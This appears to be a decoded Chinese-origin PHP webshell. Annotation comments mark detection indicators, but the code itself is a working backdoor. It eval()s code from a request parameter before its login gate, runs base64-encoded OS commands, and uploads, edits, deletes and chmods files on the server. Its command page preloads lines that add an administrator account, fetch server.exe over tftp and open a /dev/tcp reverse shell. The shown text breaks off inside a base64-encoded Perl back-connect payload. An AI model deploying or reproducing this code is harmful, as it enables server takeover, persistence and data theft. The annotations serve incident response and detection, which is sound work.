
PHP Decode

php /tmp/BNL43pbbLb.php ob_start(); define('myaddress',$_SERVER['SCRIPT_FILENAME']); ..

Decoded Output download

php /tmp/BNL43pbbLb.php 
// Bootstrap of a password-gated remote administration script (webshell).
// Start output buffering before anything is emitted.
ob_start(); 
 
// Record this script's own filesystem path; root_dir is derived from it further down.
define('myaddress',$_SERVER['SCRIPT_FILENAME']); 
 
// NOTE(review): $password, $shellname and $myurl are not assigned anywhere in the visible
// decoded output; presumably the original loader set them before this point - confirm.
define('postpass',$password); 
 
define('shellname',$shellname); 
 
define('myurl',$myurl); 
 
// When magic quotes are enabled, undo the automatic escaping so request values are used raw.
if(@get_magic_quotes_gpc()){ 
 
	foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v); 
 
	foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v); 
 
} 
 
// Code-execution path that runs BEFORE the cookie check below: `postpass` is a bare
// constant here, so the array key is the value given to define('postpass', ...) above,
// not the literal string "postpass". A request parameter carrying that name has its
// value handed to eval(), and the script exits without reaching the login gate.
// Detection: eval() applied directly to a request superglobal, with errors silenced by @,
// is a high-confidence webshell indicator for static scanners.
// NOTE(review): hmlogin() is defined outside the visible output; what it does with the
// argument 2 cannot be told from here.
if(isset($_REQUEST[postpass])){ 
 
hmlogin(2); 
 
@eval($_REQUEST[postpass]); 
 
exit;} 
 
// Login gate: the rest of the script runs only when the `postpass` cookie equals the MD5
// of the configured password. The comparison is loose (!=) and the cookie value is a
// fixed, unsalted digest, so the identical cookie value recurs on every authenticated
// request - a stable indicator to search for in web and proxy logs during response.
if($_COOKIE['postpass'] != md5(postpass)){ 
 
	// A POSTed `postpass` field is compared (loosely) with the plaintext password constant.
	if($_POST['postpass']){ 
 
		if($_POST['postpass'] == postpass){ 
 
			// Two-argument setcookie(): session cookie, no expiry, no Secure/HttpOnly flags.
			setcookie('postpass',md5($_POST['postpass'])); 
 
			// NOTE(review): hmlogin() is defined outside the visible output.
			hmlogin(); 
 
		}else{ 
 
			// The failure message is empty in this decoded output (text presumably lost in decoding).
			echo '<CENTER></CENTER>'; 
 
		} 
 
	} 
 
	// Render the login page (islogin() is defined elsewhere) and stop; nothing below runs
	// for a request that arrived without the valid cookie.
	islogin($shellname,$myurl); 
 
	exit; 
 
} 
 
 
 
// Direct GET handlers, reached only after the cookie gate above has passed.
// Each passes request values straight to helpers defined outside the visible output;
// no path validation or restriction is visible at this level.

// ?down=<path>: hand the path to do_down() (presumably streams the file - confirm).
if(isset($_GET['down'])) do_down($_GET['down']); 
 
// ?pack=<dir>: build an archive of the directory via the `eanver` class and send it as
// "<Host header>.tar.gz". The download name is taken from the client-supplied Host header.
if(isset($_GET['pack'])){ 
 
	$dir = do_show($_GET['pack']); 
 
	$zip = new eanver($dir); 
 
	$out = $zip->out; 
 
	do_download($out,$_SERVER['HTTP_HOST'].".tar.gz"); 
 
} 
 
// ?unzip=<archive>&todir=<dir>: extract an archive to a caller-chosen directory.
if(isset($_GET['unzip'])){ 
 
	css_main(); 
 
	start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']); 
 
	exit; 
 
} 
 
 
 
// Directory containing this script, with backslashes normalised to forward slashes.
define('root_dir',str_replace('\\','/',dirname(myaddress)).'/'); 
 
// True when PHP_OS starts with "WIN".
define('run_win',substr(PHP_OS, 0, 3) == "WIN"); 
 
// NOTE(review): str_path() is defined outside the visible output.
define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME'])); 
 
// Request parameters that drive the dispatcher below. `eanver` selects the page/action,
// so requests carrying an `eanver=` query parameter are a useful access-log indicator.
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : ""; 
 
$doing = isset($_POST['doing']) ? $_POST['doing'] : ""; 
 
// Directory to browse; defaults to the script's own directory.
$path = isset($_GET['path']) ? $_GET['path'] : root_dir; 
 
$name = isset($_POST['name']) ? $_POST['name'] : ""; 
 
$img = isset($_GET['img']) ? $_GET['img'] : ""; 
 
// Target path for the file operations (rename/del/copy/perm/...), taken raw from the query.
$p = isset($_GET['p']) ? $_GET['p'] : ""; 
 
// URL-encoded parent directory of $p, used to link back to the listing after an action.
$pp = urlencode(dirname($p)); 
 
if($img) css_img($img); 
 
// ?eanver=phpinfo: dump the full PHP configuration and stop.
if($eanver == "phpinfo") die(phpinfo()); 
 
// ?eanver=logout: clear the auth cookie and reload the page.
if($eanver == 'logout'){ 
 
	setcookie('postpass',null); 
 
	die('<meta http-equiv="refresh" content="0;URL=?">'); 
 
} 
 
 
 
// Menu definition: group label => (eanver action => link text). The inner keys are the
// values the left-hand menu puts into ?eanver=..., so they double as URL indicators
// (sqlshell, mysql_exec, myexp, servu, cmd, linux, downloader, port, guama, tihuan,
// scanfile, scanphp, getcode, ...).
// NOTE(review): in this decoded output all four group labels are the empty string, so as
// written the later entries overwrite the earlier ones under the same "" key; the labels
// and most link texts were presumably non-ASCII and lost in decoding.
$class = array( 
 
"" => array("upfiles" => "","phpinfo" => "","info_f" => "","phpcode" => "PHP"), 
 
"" => array("sqlshell" => "SQL","mysql_exec" => "MYSQL","myexp" => "MYSQL","servu" => "Serv-U","cmd" => "","linux" => "","downloader" => "","port" => ""), 
 
"" => array("guama" => "","tihuan" => "","scanfile" => "","scanphp" => ""), 
 
"" => array("getcode" => "") 
 
); 
 
// Status messages indexed 0-7, referenced by the file actions below; all empty in this output.
$msg = array("0" => "","1" => "","2" => "","3" => "","4" => "","5" => "","6" => "","7" => ""); 
 
// NOTE(review): css_main() is defined outside the visible output; presumably emits the page header/CSS.
css_main(); 
 
switch($eanver){ 
 
	case "left": 
 
	css_left(); 
 
		html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items1');\" target=\"_self\">"); 
 
		html_img("title");html_n(" </a></dt><dd id=\"items1\" style=\"display:block;\"><ul>"); 
 
    $ROOT_DIR = File_Mode(); 
 
    html_n("<li><a title='$ROOT_DIR' href='?eanver=main&path=$ROOT_DIR' target='main'></a></li>"); 
 
	html_n("<li><a href='?eanver=main' target='main'></a></li>"); 
 
	for ($i=66;$i<=90;$i++){$drive= chr($i).':'; 
 
    if (is_dir($drive."/")){$vol=File_Str("vol $drive");if(empty($vol))$vol=$drive; 
 
    html_n("<li><a title='$drive' href='?eanver=main&path=$drive' target='main'>($drive)</a></li>");}} 
 
	html_n("</ul></dd></dl>"); 
 
	$i = 2; 
 
	foreach($class as $name => $array){ 
 
		html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">"); 
 
		html_img("title");html_n(" $name</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>"); 
 
		foreach($array as $url => $value){ 
 
			html_n("<li><a href=\"?eanver=$url\" target='main'>$value</a></li>"); 
 
		} 
 
		html_n("</ul></dd></dl>"); 
 
		$i++; 
 
	} 
 
	html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">"); 
 
	html_img("title");html_n(" </a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>"); 
 
    html_n("<li><a title='' href='?eanver=logout' target=\"main\"></a></li>"); 
 
	html_n("</ul></dd></dl>"); 
 
	html_n("</div>"); 
 
	break; 
 
	 
 
	case "main": 
 
	css_js("1"); 
 
	$dir = @dir($path); 
 
	$REAL_DIR = File_Str(realpath($path)); 
 
	if(!empty($_POST['actall'])){echo '<div class="actall">'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'</div>';} 
 
	$NUM_D = $NUM_F = 0; 
 
	if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/'; 
 
	$ROOT_DIR = File_Mode(); 
 
	html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>:<input type='hidden' name='eanver' value='main'>"); 
 
	html_n("<input type='text' size='80' name='path' value='$path'> <input type='submit' value=''></form>"); 
 
	html_n("<br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=".urlencode($path)."'>"); 
 
	html_n("<input type=\"button\" value=\"\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=".urlencode($path)."&refile=1&name=');\"> <input type=\"button\" value=\"\" onclick=\"rusurechk('newdir','?eanver=editr&p=".urlencode($path)."&redir=1&name=');\">"); 
 
	html_input("file","upfilet","","&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "); 
 
	html_input("submit","uploadt",""); 
 
	if(!empty($_POST['newfile'])){ 
 
		if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb"; 
 
        $newfile=base64_decode($_POST['newfile']); 
 
		if(strtolower($_POST['charset'])=='utf-8'){$txt=base64_decode($_POST['txt']);}else{$txt=$_POST['txt'];} 
 
        if (substr(PHP_VERSION,0,1)>=5){if((strtolower($_POST['charset'])=='gb2312') or (strtolower($_POST['charset'])=='gbk')){$txt=iconv("UTF-8","gb2312//IGNORE" ,base64_decode($_POST['txt']));}else{$txt = array_iconv($txt);}} 
 
		echo do_write($newfile,$bin,$txt) ? '<br>'.$newfile.' '.$msg[0] : '<br>'.$newfile.' '.$msg[1]; 
 
		@touch($newfile,@strtotime($_POST['time'])); 
 
	} 
 
	html_n('</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path='.$path.'"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="45%"><b>'); 
 
	html_a('?eanver=main&path='.uppath($path),'<b></b>'); 
 
	html_n('</b></td><td align="center" width="10%"><b></b></td><td align="center" width="5%"><b></b></td>'); 
 
	html_n('<td align="center" width="8%"><b>('.get_current_user().')|</b></td>'); 
 
	html_n('<td align="center" width="10%"><b></b></td><td align="center" width="10%"><b></b></td></tr>'); 
 
	while($dirs = @$dir->read()){ 
 
		if($dirs == '.' or $dirs == '..') continue; 
 
		$dirpath = str_path("$path/$dirs"); 
 
		if(is_dir($dirpath)){ 
 
			$perm = substr(base_convert(fileperms($dirpath),10,8),-4); 
 
			$filetime = @date('Y-m-d H:i:s',@filemtime($dirpath)); 
 
			$dirpath = urlencode($dirpath); 
 
			html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$dirs.'">'); 
 
			html_img("dir"); 
 
			html_a('?eanver=main&path='.$dirpath,$dirs); 
 
			html_n('</td><td align="center">'); 
 
			html_n("<a href=\"#\" onClick=\"rusurechk('$dirs','?eanver=rename&p=$dirpath&newname=');return false;\"></a>"); 
 
			html_n("<a href=\"#\" onClick=\"rusuredel('$dirs','?eanver=deltree&p=$dirpath');return false;\"></a> "); 
 
			html_a('?pack='.$dirpath,''); 
 
			html_n('</td><td align="center">'); 
 
			html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm); 
 
            html_n('</td><td align="center">'.GetFileOwner("$path/$dirs").':'.GetFileGroup("$path/$dirs")); 
 
			html_n('</td><td align="center">'.$filetime.'</td><td align="right">'); 
 
			html_n('</td></tr>'); 
 
			$NUM_D++; 
 
		} 
 
	} 
 
	@$dir->rewind(); 
 
	while($files = @$dir->read()){ 
 
		if($files == '.' or $files == '..') continue; 
 
		$filepath = str_path("$path/$files"); 
 
		if(!is_dir($filepath)){ 
 
			$fsize = @filesize($filepath); 
 
			$fsize = File_Size($fsize); 
 
			$perm  = substr(base_convert(fileperms($filepath),10,8),-4); 
 
			$filetime = @date('Y-m-d H:i:s',@filemtime($filepath)); 
 
			$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath); 
 
			$todir=$ROOT_DIR.'/zipfile'; 
 
			$filepath = urlencode($filepath); 
 
			$it=substr($filepath,-3); 
 
			html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$files.'">'); 
 
			html_img(css_showimg($files)); 
 
			html_a($Fileurls,$files,'target="_blank"'); 
 
			html_n('</td><td align="center">'); 
 
            if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z')) 
 
			   html_a('?unzip='.$filepath,'','title="'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"'); 
 
			else 
 
               html_a('?eanver=editr&p='.$filepath,'','title="'.$files.'"'); 
 
 
 
			html_n("<a href=\"#\" onClick=\"rusurechk('$files','?eanver=rename&p=$filepath&newname=');return false;\"></a>"); 
 
			html_n("<a href=\"#\" onClick=\"rusuredel('$files','?eanver=del&p=$filepath');return false;\"></a> "); 
 
			html_n("<a href=\"#\" onClick=\"rusurechk('".urldecode($filepath)."','?eanver=copy&p=$filepath&newcopy=');return false;\"></a>"); 
 
			html_n('</td><td align="center">'); 
 
			html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm); 
 
            html_n('</td><td align="center">'.GetFileOwner("$path/$files").':'.GetFileGroup("$path/$files")); 
 
			html_n('</td><td align="center">'.$filetime.'</td><td align="right">'); 
 
			html_a('?down='.$filepath,$fsize,'title="'.$files.'"'); 
 
			html_n('</td></tr>'); 
 
			$NUM_F++; 
 
		} 
 
	} 
 
	@$dir->close(); 
 
	if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8); 
 
print<<<END 
 
</table> 
 
<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined">  
 
<input type="hidden" id="inver" name="inver" value="undefined">  
 
<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);">  
 
<input type="button" value="" onclick="SubmitUrl(': ','{$REAL_DIR}','a');return false;">  
 
<input type="button" value="" onclick="Delok('','b');return false;">  
 
<input type="button" value="" onclick="SubmitUrl(': ','0666','c');return false;">  
 
<input type="button" value="" onclick="CheckDate('{$Filetime}','d');return false;">  
 
<input type="button" value="" onclick="SubmitUrl(': ','{$_SERVER['SERVER_NAME']}.tar.gz','e');return false;"> 
 
({$NUM_D}) / ({$NUM_F})</div>  
 
</form>  
 
END; 
 
	break; 
 
	 
 
	case "editr": 
 
print<<<END 
 
<script> 
 
END; 
 
html_base(); 
 
print<<<END 
 
	</script> 
 
END; 
 
	css_js("2"); 
 
	if(!empty($_POST['uploadt'])){ 
 
		echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]); 
 
		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">'); 
 
	} 
 
	if(!empty($_GET['redir'])){ 
 
        $name=$_GET['name']; 
 
		$newdir = str_path($p.'/'.$name); 
 
		@mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]); 
 
		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">'); 
 
	} 
 
 
 
	if(!empty($_GET['refile'])){ 
 
        $name=$_GET['name']; 
 
		$jspath=urlencode($p.'/'.$name); 
 
		$pp = urlencode($p); 
 
		$p = str_path($p.'/'.$name); 
 
		$FILE_CODE = ""; 
 
		$charset= 'GB2312'; 
 
        $FILE_TIME =date('Y-m-d H:i:s',time()+3600*8); 
 
		if(@file_exists($p)) echo '""<br>'; 
 
	}else{ 
 
		$jspath=urlencode($p); 
 
		$FILE_TIME = date('Y-m-d H:i:s',filemtime($p)); 
 
        $FILE_CODE=@file_get_contents($p); 
 
	     if (substr(PHP_VERSION,0,1)>=5){ 
 
            if(empty($_GET['charset'])){ 
 
			   if(TestUtf8($FILE_CODE)>1){$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= 'GB2312';} 
 
			  }else{ 
 
			   if($_GET['charset']=='GB2312'){$charset= 'GB2312';}else{$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);} 
 
			  } 
 
		  } 
 
        $FILE_CODE = htmlspecialchars($FILE_CODE); 
 
	} 
 
print<<<END 
 
<div class="actall">: <input name="searchs" type="text" value="{$dim}" style="width:500px;"> 
 
<input type="button" value="" onclick="search(searchs.value)"></div> 
 
<form method='POST' id="editor"  action='?eanver=main&path={$pp}'> 
 
<div class="actall"> 
 
<input type="text" name="newfile"  id="newfile" value="{$p}" style="width:750px;"><input name="charset" id="charset" value="{$charset}" Type="text" style="width:80px;" onkeydown="if(event.keyCode==13)window.location='?eanver=editr&p={$jspath}&charset='+this.value;"> 
 
<input type="button" value="" onclick="window.location='?eanver=editr&p={$jspath}&charset='+this.form.charset.value;" style="width:50px;">  
 
END; 
 
html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\""); 
 
print<<<END 
 
</div> 
 
<div class="actall"><textarea name="txt" id="txt" style="width:100%;height:380px;">{$FILE_CODE}</textarea></div> 
 
<div class="actall"> <input type="text" name="time" id="mtime" value="{$FILE_TIME}" style="width:150px;"> <input type="checkbox" name="bin" value="wb+" size="" checked>()</div> 
 
<div class="actall"><input type="button" value="" onclick="CheckDate();" style="width:80px;"><input name='reset' type='reset' value=''>  
 
<input type="button" value="" onclick="window.location='?eanver=main&path={$pp}';" style="width:80px;"></div> 
 
</form> 
 
END; 
 
	break; 
 
	 
 
	// ?eanver=rename&p=<path>&newname=<name>: rename $p inside its own parent directory.
	// $p comes raw from $_GET['p'] and $pp is urlencode(dirname($p)), both set before the switch.
	case "rename": 
 
	html_n("<tr><td>"); 
 
	// New path = decoded parent directory + "/" + URL-encoded new name.
	$newname = urldecode($pp).'/'.urlencode($_GET['newname']); 
 
	// Errors are silenced with @; only a success/failure message is shown.
	@rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]); 
 
	// Redirect back to the directory listing; the break below is never reached.
	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">'); 
 
	break; 
 
	 
 
	// ?eanver=deltree&p=<dir>: delete a directory via do_deltree() (defined outside the
	// visible output; presumably recursive - confirm). $p is taken raw from $_GET['p'].
	case "deltree": 
 
	html_n("<tr><td>"); 
 
	do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]); 
 
	// Redirect back to the parent listing; the break below is never reached.
	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">'); 
 
	break; 
 
	 
 
	// ?eanver=del&p=<file>: delete a single file. $p is taken raw from $_GET['p'], so any
	// file the web server account can remove is in scope; errors are silenced with @.
	case "del": 
 
	html_n("<tr><td>"); 
 
	@unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]); 
 
	// Redirect back to the parent listing; the break below is never reached.
	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">'); 
 
	break; 
 
	 
 
	// ?eanver=copy&p=<src>&newcopy=<dst>: copy file $p to a caller-chosen destination.
	case "copy": 
 
	html_n("<tr><td>"); 
 
	// Split the destination on "/" and URL-encode every segment except the first
	// (the first segment is kept verbatim, e.g. a drive letter or an empty root segment).
	$newpath = explode('/',$_GET['newcopy']); 
 
	$pathr[0] = $newpath[0]; 
 
	for($i=1;$i < count($newpath);$i++){ 
 
		$pathr[] = urlencode($newpath[$i]); 
 
	} 
 
	$newcopy = implode('/',$pathr); 
 
	// Errors are silenced with @; only a success/failure message is shown.
	@copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]); 
 
	// Redirect back to the parent listing; the break below is never reached.
	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">'); 
 
	break; 
 
	 
 
	// ?eanver=perm&p=<path>&chmod=<mode>: show a mode picker for $p and apply the chosen mode.
	case "perm": 
 
	html_n("<form method='POST'><tr><td>".$p.' : '); 
 
	// Offer directory modes or file modes, preselecting the current mode from the query string.
	// NOTE(review): html_select() is defined elsewhere; presumably it renders a <select>
	// named "class", since that is the POST field read below - confirm.
	if(is_dir($p)){ 
 
		html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']); 
 
	}else{ 
 
		html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']); 
 
	} 
 
	html_input("submit","save",""); 
 
	back(); 
 
	// On submit, map the posted string to a fixed octal mode; only these six values are acted on.
	if($_POST['class']){ 
 
		switch($_POST['class']){ 
 
			case "0777": $change = @chmod($p,0777); break; 
 
			case "0755": $change = @chmod($p,0755); break; 
 
			case "0555": $change = @chmod($p,0555); break; 
 
			case "0666": $change = @chmod($p,0666); break; 
 
			case "0644": $change = @chmod($p,0644); break; 
 
			case "0444": $change = @chmod($p,0444); break; 
 
		} 
 
		// $change is never assigned when the posted value matches none of the cases above,
		// in which case the failure branch is taken.
		$change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]); 
 
		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">'); 
 
	} 
 
	html_n("</td></tr></form>"); 
 
	break; 
 
 
 
    case "info_f": 
 
	$dis_func = get_cfg_var("disable_functions"); 
 
	$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : ""; 
 
	$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>"; 
 
	if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);} 
 
	$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No"; 
 
	$info = array( 
 
		array("",date("YmdERROR! 
 h:i:s",time())), 
 
		array("","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"), 
 
		array("IP",gethostbyname($_SERVER['SERVER_NAME'])), 
 
		array("",PHP_OS), 
 
		array("",$_SERVER['HTTP_ACCEPT_LANGUAGE']), 
 
		array("",$_SERVER['SERVER_SOFTWARE']), 
 
		array("IP",$_SERVER["REMOTE_ADDR"]), 
 
		array("Web",$_SERVER['SERVER_PORT']), 
 
		array("PHP",strtoupper(php_sapi_name())), 
 
		array("PHP",PHP_VERSION), 
 
		array("",Info_Cfg("safemode")), 
 
		array("",$adminmail), 
 
		array("",myaddress), 
 
		array(" URL  allow_url_fopen",Info_Cfg("allow_url_fopen")), 
 
		array("curl_exec",Info_Fun("curl_exec")), 
 
		array(" enable_dl",Info_Cfg("enable_dl")), 
 
		array(" display_errors",Info_Cfg("display_errors")), 
 
		array(" register_globals",Info_Cfg("register_globals")), 
 
		array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")), 
 
		array(" memory_limit",Info_Cfg("memory_limit")), 
 
		array("POST post_max_size",Info_Cfg("post_max_size")), 
 
		array(" upload_max_filesize",$upsize), 
 
		array(" max_execution_time",Info_Cfg("max_execution_time").""), 
 
		array(" disable_functions",$dis_func), 
 
		array("phpinfo()",$phpinfo), 
 
		array("diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'), 
 
		array(" GD Library",Info_Fun("imageline")), 
 
		array("IMAP",Info_Fun("imap_close")), 
 
		array("MySQL",Info_Fun("mysql_close")), 
 
		array("SyBase",Info_Fun("sybase_close")), 
 
		array("Oracle",Info_Fun("ora_close")), 
 
		array("Oracle 8 ",Info_Fun("OCILogOff")), 
 
		array("PREL PCRE",Info_Fun("preg_match")), 
 
		array("PDF",Info_Fun("pdf_close")), 
 
		array("Postgre SQL",Info_Fun("pg_close")), 
 
		array("SNMP",Info_Fun("snmpget")), 
 
		array("(Zlib)",Info_Fun("gzclose")), 
 
		array("XML",Info_Fun("xml_set_object")), 
 
		array("FTP",Info_Fun("ftp_login")), 
 
		array("ODBC",Info_Fun("odbc_close")), 
 
		array("Session",Info_Fun("session_start")), 
 
		array("Socket",Info_Fun("fsockopen")), 
 
	); 
 
	$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host"); 
 
	echo '<table width="100%" border="0">'; 
 
	for($i = 0;$i < count($info);$i++){echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";} 
 
try{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber"); 
 
$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort"); 
 
$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort"); 
 
}catch(Exception $e){} 
 
    echo '<tr><td width="40%">Terminal Service</td><td>'.$registry_proxystring.'</td></tr>'."\n"; 
 
	echo '<tr><td width="40%">Telnet</td><td>'.$Telnet.'</td></tr>'."\n"; 
 
	echo '<tr><td width="40%">PcAnywhere</td><td>'.$PcAnywhere.'</td></tr>'."\n"; 
 
	echo '</table>'; 
 
	break; 
 
 
 
 
 
    // ?eanver=cmd: operating-system command execution page.
    case "cmd": 
 
	$res = ''; 
 
	$cmd = 'dir'; 
 
	// The POSTed `cmd` field is base64-decoded and passed to Exec_Run() (defined outside the
	// visible output). Because the command travels base64-encoded in the POST body, plain-text
	// pattern matching on request bodies will not see it; decode before inspecting.
	// $cmd is HTML-escaped for redisplay; $res is interpolated into the page unescaped.
	if(!empty($_POST['cmd'])){$res = Exec_Run(base64_decode($_POST['cmd']));$cmd = htmlspecialchars(base64_decode($_POST['cmd']));} 
 

 
// The heredocs below are emitted verbatim as page JavaScript/HTML and cannot carry PHP comments.
// sFull() fills the command box with canned strings. Indicators for responders: a local
// account named "envl" added to the administrators group, a tftp fetch of server.exe to
// c:\server.exe, and a shell connection back to the requesting client's address
// ($_SERVER["REMOTE_ADDR"]) on TCP port 12666.
print<<<END 
 
<script language="javascript"> 
 
function sFull(i){ 
 
	Str = new Array(11); 
 
	Str[0] = "dir"; 
 
	Str[1] = "net user envl envl /add"; 
 
	Str[2] = "net localgroup administrators envl /add"; 
 
	Str[3] = "netstat -ano"; 
 
	Str[4] = "ipconfig"; 
 
	Str[5] = "copy c:\\1.php d:\\2.php"; 
 
	Str[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe"; 
 
	Str[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123"; 
 
	Str[8] = "tasklist -svc"; 
 
	document.getElementById('cmd').value = Str[i]; 
 
	return true; 
 
} 
 
END; 
 
// NOTE(review): html_base() is defined elsewhere; presumably it emits the base64encode()
// JavaScript helper that SubmitUrl() below calls - confirm.
html_base(); 
 
// SubmitUrl() base64-encodes the command client-side before the form is posted.
print<<<END 
 
function SubmitUrl(){ 
 
			document.getElementById('cmd').value = base64encode(document.getElementById('cmd').value); 
 
			document.getElementById('gform').submit(); 
 
} 
 
</script> 
 
<form method="POST" name="gform" id="gform" ><center><div class="actall">BASE64</div><div class="actall"> 
 
 <input type="text" name="cmd" id="cmd" value="{$cmd}" onkeydown="if(event.keyCode==13)SubmitUrl();" style="width:399px;"> 
 

 
	<input type="button" value="" onclick="SubmitUrl();" style="width:80px;"> 
 
</div> 
 
<div class="actall"><textarea name="show" style="width:660px;height:399px;">{$res}</textarea></div></center> 
 
</form> 
 
END; 
 
	break; 
 
 
 
 
 
 
 
case "linux": 
 
 
 
	$yourip = $_COOKIE['yourip'] ? $_COOKIE['yourip'] : getenv('REMOTE_ADDR'); 
 
	$yourport = $_COOKIE['yourport'] ? $_COOKIE['yourport'] : '12388'; 
 
 
 
	$system=strtoupper(substr(PHP_OS, 0, 3)); 
 
print<<<END 
 
<div class="actall"><br> 
 
			"nc -vv -l 12388"<br> 
 
			IP,NC</div> 
 
<form method="POST" name="kform" id="kform"> 
 
<div class="actall"> <input type="text" name="yourip" value="{$yourip}" style="width:400px"></div> 
 
<div class="actall"> <input type="text" name="yourport" value="{$yourport}" style="width:400px"></div> 
 
<div class="actall"> <select name="use" > 
 
<option value="perl">Perl</option> 
 
<option value="c">C</option> 
 
<option value="php">PHP</option> 
 
<option value="nc">NC</option> 
 
</select></div> 
 
<div class="actall"><input type="submit" value="" style="width:80px;"></div></form> 
 
END; 
 
	if((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) 
 
	{ 
 
    setcookie('yourip',$backip); 
 
	setcookie('yourport',$backport); 
 
	 
 
		echo '<div class="actall">'; 
 
		if($_POST['use'] == 'perl') 
 
		{ 
 
			$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". 
 
			"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". 
 
			"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". 
 
